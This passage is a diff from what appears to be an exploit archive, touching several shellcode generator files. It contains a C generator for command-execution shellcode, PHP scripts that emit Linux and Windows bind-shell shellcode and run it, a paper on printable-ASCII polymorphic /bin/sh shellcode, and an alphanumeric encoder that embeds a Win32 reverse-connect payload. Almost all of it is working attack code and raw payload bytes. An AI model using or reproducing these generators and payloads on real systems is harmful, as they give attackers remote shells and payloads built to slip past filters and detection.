(((k-1)/2)%2) : ((k/2)%2); + totl+=(6+5*((k-(k%4))/4)+4*b1+7*b); + for(i=2; i2) + push_shc(shc, argv[argc-1], &shp); + else + push_shc(shc, cmd, &shp); + memset(shc+(shp++), 0x89, 1); + memset(shc+(shp++), 0xe6, 1); + if(argc>2){ + for(i=argc-2;i>1;i--) + push_shc(shc, argv[i], &shp); + push_shc(shc, cmd, &shp); + } + memset(shc+(shp++), 0x50, 1); + memset(shc+(shp++), 0x56, 1); + if(argc>2){ + for(i=argc-2;i>1;i--){ + memset(shc+(shp++), 0x83, 1); + memset(shc+(shp++), 0xee, 1); + memset(shc+(shp++), strlen(argv[i])+1, 1); + memset(shc+(shp++), 0x56, 1); + } + memset(shc+(shp++), 0x83, 1); + memset(shc+(shp++), 0xee, 1); + memset(shc+(shp++), strlen(cmd)+1, 1); + memset(shc+(shp++), 0x56, 1); + } + memcpy(shc+shp, end, 16); + print_c(shc,totl); + return 0; +} +void print_c(__u8 *s,int l){ + int k; + for(k=0;k http://www.shell-storm.org/shellcode/ -*/ - -function syntax() - { - echo "\nSyntax:\nroot@laptop:/# php ./payload.php \n\n"; - } - -function linux86bind($port) - { - if($port > 65535 || $port < 4100){ - echo "Erreur Port\nSelect a port between 4100 and 65535\n"; - return false; - } - - $inser .= "\nchar shellcode[] = \n"; - $inser .= " /* BindPort TCP/$port; Linux/x86; Gen:http://www.shell-storm.org */\n"; - $inser .= "\n"; - $inser .= " \x22\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x31\\xdb\\xf7\\xe3\\xb0\\x66\\x53\\x43\\x53\x22\n"; - $inser .= " \x22\\x43\\x53\\x89\\xe1\\x4b\\xcd\\x80\\x89\\xc7\\x52\\x66\\x68\\x"; - - $res_port = base_convert($port, 10, 16); - - $length = strlen($res_port)-1; - $i = 1; - - for($idx = 0; $idx < $length+1; $idx++) - { - $i++; - if($i == 4) - $inser .= "\\x"; - - $inser .= $res_port[$idx]; - } - - $inser .= "\\x43\\x66\\x53\x22\n"; - $inser .= " \x22\\x89\\xe1\\xb0\\x10\\x50\\x51\\x57\\x89\\xe1\\xb0\\x66\\xcd\\x80\\xb0\\x66\\xb3\\x04\x22\n"; - $inser .= " \x22\\xcd\\x80\\x50\\x50\\x57\\x89\\xe1\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\\x89\\xc3\\xb0\x22\n"; - $inser .= " 
\x22\\x3f\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x51\\x68n/sh\\x68//bi\\x89\\xe3\\x51\\x53\\x89\x22\n"; - $inser .= " \x22\\xe1\\xb0\\x0b\\xcd\\x80\x22\x3b\n"; - $inser .= "\n"; - $inser .= " printf(\x22Length: %d\\n\x22,strlen(shellcode));\n"; - $inser .= " (*(void(*)()) shellcode)();\n"; - $inser .= "\n"; - $inser .= "\n"; - - return $inser; -} - -if($argc < 2){ - syntax(); - return false; - } - $port = $argv[1]; - echo linux86bind($port); - -?> - + http://www.shell-storm.org/shellcode/ +*/ + +function syntax() + { + echo "\nSyntax:\nroot@laptop:/# php ./payload.php \n\n"; + } + +function linux86bind($port) + { + if($port > 65535 || $port < 4100){ + echo "Erreur Port\nSelect a port between 4100 and 65535\n"; + return false; + } + + $inser .= "\nchar shellcode[] = \n"; + $inser .= " /* BindPort TCP/$port; Linux/x86; Gen:http://www.shell-storm.org */\n"; + $inser .= "\n"; + $inser .= " \x22\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x31\\xdb\\xf7\\xe3\\xb0\\x66\\x53\\x43\\x53\x22\n"; + $inser .= " \x22\\x43\\x53\\x89\\xe1\\x4b\\xcd\\x80\\x89\\xc7\\x52\\x66\\x68\\x"; + + $res_port = base_convert($port, 10, 16); + + $length = strlen($res_port)-1; + $i = 1; + + for($idx = 0; $idx < $length+1; $idx++) + { + $i++; + if($i == 4) + $inser .= "\\x"; + + $inser .= $res_port[$idx]; + } + + $inser .= "\\x43\\x66\\x53\x22\n"; + $inser .= " \x22\\x89\\xe1\\xb0\\x10\\x50\\x51\\x57\\x89\\xe1\\xb0\\x66\\xcd\\x80\\xb0\\x66\\xb3\\x04\x22\n"; + $inser .= " \x22\\xcd\\x80\\x50\\x50\\x57\\x89\\xe1\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\\x89\\xc3\\xb0\x22\n"; + $inser .= " \x22\\x3f\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x51\\x68n/sh\\x68//bi\\x89\\xe3\\x51\\x53\\x89\x22\n"; + $inser .= " \x22\\xe1\\xb0\\x0b\\xcd\\x80\x22\x3b\n"; + $inser .= "\n"; + $inser .= " printf(\x22Length: %d\\n\x22,strlen(shellcode));\n"; + $inser .= " (*(void(*)()) shellcode)();\n"; + $inser .= "\n"; + $inser .= "\n"; + + return $inser; +} + +if($argc < 2){ + syntax(); + return false; + } + $port = $argv[1]; + echo 
linux86bind($port); + +?> + # milw0rm.com [2009-06-09] \ No newline at end of file diff --git a/platforms/generator/shellcode/13283.php b/platforms/generator/shellcode/13283.php index 2b6395795..e95b6aea2 100755 --- a/platforms/generator/shellcode/13283.php +++ b/platforms/generator/shellcode/13283.php 
@@ -1,65 +1,65 @@
- http://www.shell-storm.org/shellcode/
-*/
-
-function syntax()
- {
- echo "\nSyntax:\nroot@laptop:/# php ./payload.php \n\n";
- }
-
-function win32bind($port)
- {
- if($port > 65535 || $port < 4100){
- echo "Erreur Port\nSelect a port between 4100 and 65535\n";
- return false;
- }
-
- $inser .= "\nchar shellcode[] = \n";
- $inser .= " /* BindPort TCP/$port; Os:XP/SP1; Gen:http://www.shell-storm.org */\n";
- $inser .= "\n";
-
- $inser .= " \x22\\x83\\xC4\\xEC\\x33\\xC0\\x50\\x50\\x50\\x6A\\x06\\x6A\\x01\\x6A\\x02\\xB8\x22\n";
- $inser .= " \x22\\x01\\x5A\\xAB\\x71\\xFF\\xD0\\x8B\\xD8\\x33\\xC0\\x89\\x45\\xF4\\xB0\\x02\x22\n";
- $inser .= " \x22\\x66\\x89\\x45\\xF0\\x66\\xC7\\x45\\xF2";
- $inser .= "\\x";
-
- $res_port = base_convert($port, 10, 16);
-
- $length = strlen($res_port)-1;
- $i = 1;
-
- for($idx = 0; $idx < $length+1; $idx++)
- {
- $i++;
- if($i == 4)
- $inser .= "\\x";
-
- $inser .= $res_port[$idx];
- }
- $inser .= "\\x6A\\x10\\x8D\\x55\\xF0\x22\n";
- $inser .= " \x22\\x52\\x53\\xB8\\xCE\\x3E\\xAB\\x71\\xFF\\xD0\\x6A\\x01\\x53\\xB8\\xE2\\x5D\x22\n";
- $inser .= " \x22\\xAB\\x71\\xFF\\xD0\\x33\\xC0\\x50\\x50\\x53\\xB8\\x8D\\x86\\xAB\\x71\\xFF\x22\n";
- $inser .= " \x22\\xD0\\x8B\\xD8\\xBA\\x1D\\x20\\xE8\\x77\\x53\\x6A\\xF6\\xFF\\xD2\\x53\\x6A\x22\n";
- $inser .= " \x22\\xF5\\xFF\\xD2\\x53\\x6A\\xF4\\xFF\\xD2\\xC7\\x45\\xFB\\x41\\x63\\x6D\\x64\x22\n";
- $inser .= " \x22\\x8D\\x45\\xFC\\x50\\xB8\\x44\\x80\\xC2\\x77\\xFF\\xD0\x22\x3b\n\n";
- $inser .= " printf(\x22Length: %d\\n\x22,strlen(shellcode));\n";
- $inser .= " (*(void(*)()) shellcode)();\n\n";
-
- return $inser;
-}
-
-if($argc < 2){
- syntax();
- return false;
- }
- $port = $argv[1];
- echo win32bind($port);
-
-?>
-
+ http://www.shell-storm.org/shellcode/
+*/
+
+function syntax()
+ {
+ echo "\nSyntax:\nroot@laptop:/# php ./payload.php \n\n";
+ }
+
+function win32bind($port)
+ {
+ if($port > 65535 || $port < 4100){
+ echo "Erreur Port\nSelect a port between 4100 and 65535\n";
return false;
+ }
+
+ $inser .= "\nchar shellcode[] = \n";
+ $inser .= " /* BindPort TCP/$port; Os:XP/SP1; Gen:http://www.shell-storm.org */\n";
+ $inser .= "\n";
+
+ $inser .= " \x22\\x83\\xC4\\xEC\\x33\\xC0\\x50\\x50\\x50\\x6A\\x06\\x6A\\x01\\x6A\\x02\\xB8\x22\n";
+ $inser .= " \x22\\x01\\x5A\\xAB\\x71\\xFF\\xD0\\x8B\\xD8\\x33\\xC0\\x89\\x45\\xF4\\xB0\\x02\x22\n";
+ $inser .= " \x22\\x66\\x89\\x45\\xF0\\x66\\xC7\\x45\\xF2";
+ $inser .= "\\x";
+
+ $res_port = base_convert($port, 10, 16);
+
+ $length = strlen($res_port)-1;
+ $i = 1;
+
+ for($idx = 0; $idx < $length+1; $idx++)
+ {
+ $i++;
+ if($i == 4)
+ $inser .= "\\x";
+
+ $inser .= $res_port[$idx];
+ }
+ $inser .= "\\x6A\\x10\\x8D\\x55\\xF0\x22\n";
+ $inser .= " \x22\\x52\\x53\\xB8\\xCE\\x3E\\xAB\\x71\\xFF\\xD0\\x6A\\x01\\x53\\xB8\\xE2\\x5D\x22\n";
+ $inser .= " \x22\\xAB\\x71\\xFF\\xD0\\x33\\xC0\\x50\\x50\\x53\\xB8\\x8D\\x86\\xAB\\x71\\xFF\x22\n";
+ $inser .= " \x22\\xD0\\x8B\\xD8\\xBA\\x1D\\x20\\xE8\\x77\\x53\\x6A\\xF6\\xFF\\xD2\\x53\\x6A\x22\n";
+ $inser .= " \x22\\xF5\\xFF\\xD2\\x53\\x6A\\xF4\\xFF\\xD2\\xC7\\x45\\xFB\\x41\\x63\\x6D\\x64\x22\n";
+ $inser .= " \x22\\x8D\\x45\\xFC\\x50\\xB8\\x44\\x80\\xC2\\x77\\xFF\\xD0\x22\x3b\n\n";
+ $inser .= " printf(\x22Length: %d\\n\x22,strlen(shellcode));\n";
+ $inser .= " (*(void(*)()) shellcode)();\n\n";
+
+ return $inser;
+}
+
+if($argc < 2){
+ syntax();
+ return false;
+ }
+ $port = $argv[1];
+ echo win32bind($port);
+
+?>
+ # milw0rm.com [2009-06-09]
\ No newline at end of file
diff --git a/platforms/generator/shellcode/13284.txt b/platforms/generator/shellcode/13284.txt
index 6fd20ae7d..026c798c8 100755
--- a/platforms/generator/shellcode/13284.txt
+++ b/platforms/generator/shellcode/13284.txt
@@ -1,103 +1,103 @@ -{========================================================================} -{ /bin/sh Polymorphic shellcode with printable ASCII characters } -{========================================================================} - -A paper by the FHM crew: - -http://fhm.noblogs.org - -Contact us at: - --------------------------------------------- - -sorrow: rawhazard@autistici.org; betat@hotmail.it - --------------------------------------------- - -fhm crew: fhm@autistici.org; freehackersmind@gmail.com - --------------------------------------------- - - -Assembly code for /bin/sh polymorphic shellcode: - -BITS 32 -;assembly code for polymorphic shellcode -push esp ; Put current ESP -pop eax ; into EAX. -sub eax,0x39393333 ; Subtract printable values -sub eax,0x72727550 ; to add 860 to EAX. -sub eax,0x54545421 -push eax ; Put EAX back into ESP. -pop esp ; Effectively ESP = ESP + 860 -and eax,0x454e4f4a -and eax,0x3a313035 ; Zero out EAX. -sub eax,0x346d6d25 ; Subtract printable values -sub eax,0x256d6d25 ; to make EAX = 0x80cde189. -sub eax,0x2557442d ; (last 4 bytes from shellcode.bin) -push eax ; Push these bytes to stack at ESP. -sub eax,0x59316659 ; Subtract more printable values -sub eax,0x59667766 ; to make EAX = 0x53e28951. 
-sub eax,0x7a537a79 ; (next 4 bytes of shellcode from the end) -push eax -sub eax,0x25696969 -sub eax,0x25786b5a -sub eax,0x25774625 -push eax ; EAX = 0xe3896e69 -sub eax,0x366e5858 -sub eax,0x25773939 -sub eax,0x25747470 -push eax ; EAX = 0x622f6868 -sub eax,0x25257725 -sub eax,0x71717171 -sub eax,0x5869506a -push eax ; EAX = 0x732f2f68 -sub eax,0x63636363 -sub eax,0x44307744 -sub eax,0x7a434957 -push eax ; EAX = 0x51580b6a -sub eax,0x63363663 -sub eax,0x6d543057 -push eax ; EAX = 0x80cda4b0 -sub eax,0x54545454 -sub eax,0x304e4e25 -sub eax,0x32346f25 -sub eax,0x302d6137 -push eax ; EAX = 0x99c931db -sub eax,0x78474778 -sub eax,0x78727272 -sub eax,0x774f4661 -push eax ; EAX = 0x31c03190 -sub eax,0x41704170 -sub eax,0x2d772d4e -sub eax,0x32483242 -push eax ; EAX = 0x90909090 -push eax -push eax ; Build a NOP sled. -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax - -Then use nasm on the assembly code (nasm asmcode.s) and print it (echo $(cat ./asmcode) ), you will obtain this output: - --[final code]- -TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6- 99w%-ptt%P-%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT-%NN0-%o42-7a-0P-xGGx-rrrx- aFOwP-pApA-N-w--B2H2PPPPPPPPPPPPPPPPPPPPPP --[/final code]- - -That string is your polymorphic shellcode with printable ascii characters. 
- +{========================================================================} +{ /bin/sh Polymorphic shellcode with printable ASCII characters } +{========================================================================} + +A paper by the FHM crew: + +http://fhm.noblogs.org + +Contact us at: + +-------------------------------------------- + +sorrow: rawhazard@autistici.org; betat@hotmail.it + +-------------------------------------------- + +fhm crew: fhm@autistici.org; freehackersmind@gmail.com + +-------------------------------------------- + + +Assembly code for /bin/sh polymorphic shellcode: + +BITS 32 +;assembly code for polymorphic shellcode +push esp ; Put current ESP +pop eax ; into EAX. +sub eax,0x39393333 ; Subtract printable values +sub eax,0x72727550 ; to add 860 to EAX. +sub eax,0x54545421 +push eax ; Put EAX back into ESP. +pop esp ; Effectively ESP = ESP + 860 +and eax,0x454e4f4a +and eax,0x3a313035 ; Zero out EAX. +sub eax,0x346d6d25 ; Subtract printable values +sub eax,0x256d6d25 ; to make EAX = 0x80cde189. +sub eax,0x2557442d ; (last 4 bytes from shellcode.bin) +push eax ; Push these bytes to stack at ESP. +sub eax,0x59316659 ; Subtract more printable values +sub eax,0x59667766 ; to make EAX = 0x53e28951. 
+sub eax,0x7a537a79 ; (next 4 bytes of shellcode from the end) +push eax +sub eax,0x25696969 +sub eax,0x25786b5a +sub eax,0x25774625 +push eax ; EAX = 0xe3896e69 +sub eax,0x366e5858 +sub eax,0x25773939 +sub eax,0x25747470 +push eax ; EAX = 0x622f6868 +sub eax,0x25257725 +sub eax,0x71717171 +sub eax,0x5869506a +push eax ; EAX = 0x732f2f68 +sub eax,0x63636363 +sub eax,0x44307744 +sub eax,0x7a434957 +push eax ; EAX = 0x51580b6a +sub eax,0x63363663 +sub eax,0x6d543057 +push eax ; EAX = 0x80cda4b0 +sub eax,0x54545454 +sub eax,0x304e4e25 +sub eax,0x32346f25 +sub eax,0x302d6137 +push eax ; EAX = 0x99c931db +sub eax,0x78474778 +sub eax,0x78727272 +sub eax,0x774f4661 +push eax ; EAX = 0x31c03190 +sub eax,0x41704170 +sub eax,0x2d772d4e +sub eax,0x32483242 +push eax ; EAX = 0x90909090 +push eax +push eax ; Build a NOP sled. +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax + +Then use nasm on the assembly code (nasm asmcode.s) and print it (echo $(cat ./asmcode) ), you will obtain this output: + +-[final code]- +TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6- 99w%-ptt%P-%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT-%NN0-%o42-7a-0P-xGGx-rrrx- aFOwP-pApA-N-w--B2H2PPPPPPPPPPPPPPPPPPPPPP +-[/final code]- + +That string is your polymorphic shellcode with printable ascii characters. + # milw0rm.com [2008-08-31] \ No newline at end of file diff --git a/platforms/generator/shellcode/13285.c b/platforms/generator/shellcode/13285.c index a9931873f..0221f4859 100755 --- a/platforms/generator/shellcode/13285.c +++ b/platforms/generator/shellcode/13285.c 
@@ -1,73 +1,73 @@ -/** - * - * BlackLight's shellcode generator for Linux x86 - * Tested anywhere, working & NULL-free - * - * Usage: ./generator - * ...and then you've got a ready2inject NULL-free shellcode for the command you like - * - * copyleft 2008 by BlackLight - * < http://blacklight.gotdns.org > - * - * Released under GPL v.3 licence - * - * Greetz to: evilsocket, for the idea he gave me ;) - * Greetz to: my friends, who tested, used and appreciated this code and helped - * me to improve it to what it is now - * Greetz to: my girl, next to me in any moment even if she had no idea - * about what I was doing ^^ - */ - -#include -#include -#include - -char code[] = - "\\x60" /*pusha*/ - "\\x31\\xc0" /*xor %eax,%eax*/ - "\\x31\\xd2" /*xor %edx,%edx*/ - "\\xb0\\x0b" /*mov $0xb,%al*/ - "\\x52" /*push %edx*/ - "\\x68\\x6e\\x2f\\x73\\x68" /*push $0x68732f6e*/ - "\\x68\\x2f\\x2f\\x62\\x69" /*push $0x69622f2f*/ - "\\x89\\xe3" /*mov %esp,%ebx*/ - "\\x52" /*push %edx*/ - "\\x68\\x2d\\x63\\x63\\x63" /*push $0x6363632d*/ - "\\x89\\xe1" /*mov %esp,%ecx*/ - "\\x52" /*push %edx*/ - "\\xeb\\x07" /*jmp 804839a */ - "\\x51" /*push %ecx*/ - "\\x53" /*push %ebx*/ - "\\x89\\xe1" /*mov %esp,%ecx*/ - "\\xcd\\x80" /*int $0x80*/ - "\\x61" /*popa*/ - "\\xe8\\xf4\\xff\\xff\\xff" /*call 8048393 */; - -int main (int argc, char **argv) { - int i,len=0; - char *shell,*cmd; - - if (!argv[1]) - exit(1); - - for (i=1; i + * ...and then you've got a ready2inject NULL-free shellcode for the command you like + * + * copyleft 2008 by BlackLight + * < http://blacklight.gotdns.org > + * + * Released under GPL v.3 licence + * + * Greetz to: evilsocket, for the idea he gave me ;) + * Greetz to: my friends, who tested, used and appreciated this code and helped + * me to improve it to what it is now + * Greetz to: my girl, next to me in any moment even if she had no idea + * about what I was doing ^^ + */ + +#include +#include +#include + +char code[] = + "\\x60" /*pusha*/ + "\\x31\\xc0" /*xor 
%eax,%eax*/ + "\\x31\\xd2" /*xor %edx,%edx*/ + "\\xb0\\x0b" /*mov $0xb,%al*/ + "\\x52" /*push %edx*/ + "\\x68\\x6e\\x2f\\x73\\x68" /*push $0x68732f6e*/ + "\\x68\\x2f\\x2f\\x62\\x69" /*push $0x69622f2f*/ + "\\x89\\xe3" /*mov %esp,%ebx*/ + "\\x52" /*push %edx*/ + "\\x68\\x2d\\x63\\x63\\x63" /*push $0x6363632d*/ + "\\x89\\xe1" /*mov %esp,%ecx*/ + "\\x52" /*push %edx*/ + "\\xeb\\x07" /*jmp 804839a */ + "\\x51" /*push %ecx*/ + "\\x53" /*push %ebx*/ + "\\x89\\xe1" /*mov %esp,%ecx*/ + "\\xcd\\x80" /*int $0x80*/ + "\\x61" /*popa*/ + "\\xe8\\xf4\\xff\\xff\\xff" /*call 8048393 */; + +int main (int argc, char **argv) { + int i,len=0; + char *shell,*cmd; + + if (!argv[1]) + exit(1); + + for (i=1; i. - - +-----------+ - WORKS CITED - +-----------+ - +--------------------------------------------------------------------------------------------------+ - |Matt Conover, Soren Macbeth, Avri Schneider 05 October 2004 | - |Encode2Alnum (polymorphic alphanumeric decoder/encoder) | - |Full-Disclosure | - | | - |CLET Team. Aug. 2003 | - |Polymorphic Shellcode Engine | - |Phrack | - | | - |Ionescu, Costin. 1 July 2003 | - |Re: GetPC code (was: Shellcode from ASCII) | - |Vuln-Dev | - | | - |rix. Aug. 2001 | - |Writing ia32 alphanumeric shellcodes | - |Phrack | - | | - |Wever, Berend-Jan. 28 Jan. 
2001 | - |Alphanumeric GetPC code | - |Vuln-Dev | - |ALPHA3 | - +--------------------------------------------------------------------------------------------------+ -////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// -*/ -#include -#include -#include - -#define MAX_BYTES 0x100 -#define MAX_ENCODED_SHELLCODE 2000 //this will be allocated on the stack -#define MIN_IP_STR_LEN 7 -#define MAX_IP_STR_LEN 15 - -#define OFFSET_XOR_AL1_A 15 -#define OFFSET_XOR_AL1_B 18 -#define OFFSET_XOR_AL2_A 37 -#define OFFSET_XOR_AL2_B 40 -#define OFFSET_PUSH_DWORD1 0 -#define OFFSET_PUSH_DWORD2 1 -#define OFFSET_PUSH_DWORD3 4 -#define OFFSET_PUSH_DWORD4 12 -#define OFFSET_RANDOMIZED_DECODER_HEAD 14 -#define SIZE_RANDOMIZED_DECODER_HEAD 16 -BYTE EncodedShellcode[] = // encoded 336 bytes - "PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO" - "wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt" - "Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH" - "HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq" - "4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL" - "mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0" - "9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px" - "11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc" - "CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v" - "RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD" - "kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk" - "1telLPYuGyNvX1TyJ3yLdOwckr"; - -// example: make encoder choose more uppercase bytes... 
-#define ADDITIONAL_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ" - -#define ALNUM_CHARSET ADDITIONAL_CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset - // feel free to -//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////change - YMMV -#define REGISTER_WITH_ADDRESS_OF_SHELLCODE esp // <--- change this to the register holding the address of the decoder//////////// -#define _Q(str) #str -#define Q(str) _Q(str) -#define P(str) #str ##" // <--- buffer offset\n"## _Q(str) -/////////////////////////////////// -#define CONNECT_BACK_SHELLCODE // -//#undef CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] >-----------------. - /////////////////////////////////////////////////////////////////// | -int main(); // | -UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length); // | -UCHAR get_push_register_instruction(UCHAR *reg); // | -UCHAR get_random_alnum_value(); // | -UCHAR get_random_alnum_push_dword_opcode(); // | -UCHAR *get_nop_slide(UINT size, UINT slide); /////// | -UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);// | -UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide); // | -UCHAR *shuffle(UCHAR str[], UINT length); /////// | -DWORD my_htonl(DWORD dw_in); // | -DWORD ip_str_to_dw(UCHAR *str); // | -BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key); // | -BOOL is_alnum(UCHAR c); // | -BOOL str_is_alnum(UCHAR *str); // | -UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index); // | -UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1); // | -struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c); // | -struct xor2_key *choose_random_node(struct xor2_key *head); // | 
-void free_p_xor2_key(struct xor2_key *node); // | - // | -struct xor2_key { // | - UCHAR xor2; // | - UCHAR key; // | - struct xor2_key *prev; // | - struct xor2_key *next; // | -} xor2_key; // | - // | - // | -// Title: Win32 Reverse Connect // | -// Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 // | -// Author: hdm[at]metasploit.com // | -#ifdef CONNECT_BACK_SHELLCODE // | - #define OFFSET_IP_ADDRESS 154 // | - #define OFFSET_TCP_PORT_NUMBER 159 // | - #define IP_ADDRESS "127.0.0.1" // | - #define TCP_PORT_NUMBER 123 // | - DWORD ip_address; // | - UCHAR shellcode[] = // | - "\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa" // | - "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2" // | - "\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e" // | - "\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64" // | - "\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57" // | - "\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a" // | - "\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8" // | - "\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90" // | - "\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57" // | - "\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68" // | - "IPIP" // I.P. 
address // | - "\x68" // | - "PORT" // TCP port number // | - "\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44\x8d\x3c\x24" // | - "\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d" // | - "\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10" // | - "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00\x51\xff\x55" // | - "\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24\x57\xff\x55" // | - "\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b" // | - "\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49" // | - "\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1" // | - "\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01" // | - "\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb" // | - "\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"; // | -#else ////////////////////////////////////// | - UCHAR shellcode[] = "\xCC YOUR SHELLCODE GOES HERE \xCC"; // <----------------- here ------------------------------------------' -#endif // -DWORD size = sizeof(shellcode)-1; // - // -int main() { ///////////////////////////////////////////////////////// - //(decoder address is in ecx when decoder starts) // - UCHAR PUSH_REGISTER_WITH_DECODER_ADDRESS = get_push_register_instruction(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)); // >----------. -// // | -#define END_OF_ENCODED_SHELLCODE 'A','L','D','N' // this is the terminating string of the encoded shellcode // | - UCHAR str_end_of_encoded_shellcode[]= {END_OF_ENCODED_SHELLCODE}; //////////////////////////////////////////////// | - UCHAR xor_al1 = get_random_alnum_value(); // this is used to zero out AL the first time | - UCHAR xor_al2 = get_random_alnum_value(); // this is used to zero out AL the second time | - int offset_imul_key = '\xC1';//////////////////////// | - int jne_xor1 = '\xC2';// >---------------------------------------------------------. 
| - int jne_xor2 = '\xC3';// >--------------------------------------------------------------| | - // you would need to play with these two values if you want to reduce | | - // the size of the NOP slides - they obviously need to stay alnum. | | - // You could also play with the value of AL before the XOR is done | | - // to get your desired negative offset. keep in mind that it will cost | | - // you instructions to get al to the value you want (if you use xor of | | - // two alphanumeric bytes, you would need to push first alphanumeric | | - // char to the stack, pop eax, then xor it with it's alnum complement) | | - // This playing around would result in an even harder to detect decoder | | - // as the offsets would be different | | - int size_decoder ='\xC4'; // | | - int half_size_decoder ='\xC5'; //////////////////////////////////////////////////////////////////// | | - UCHAR imul_instruction_1 ='\x6B'; // | | - UCHAR imul_instruction_2 ='\x41'; // | | - UCHAR imul_instruction_3 ='\xC6'; //size of decoder+1 // | | - UCHAR imul_instruction_4 ='\xC7'; //initial key (random alnum) // | | - // // | | - UINT column=0, i=0; /////////////////////////////// | | - UCHAR *alnum = ALNUM_CHARSET; // | | - UCHAR *p_alnum = alnum; // | | - UCHAR decoder[] = // | | - { //////////////////////////////////////////////////////////////////////////////// | | - // | | - //[step_1] -- multiply first encoded byte with key | | - //[step_2] -- xor result of step_1 with second encoded byte to get the decoded byte | | - // | | - // Each binary byte is encoded into three alphanumeric bytes. | | - // The first byte multipled by the third byte xor'ed against the second byte yeilds the original | | - // binary byte. 
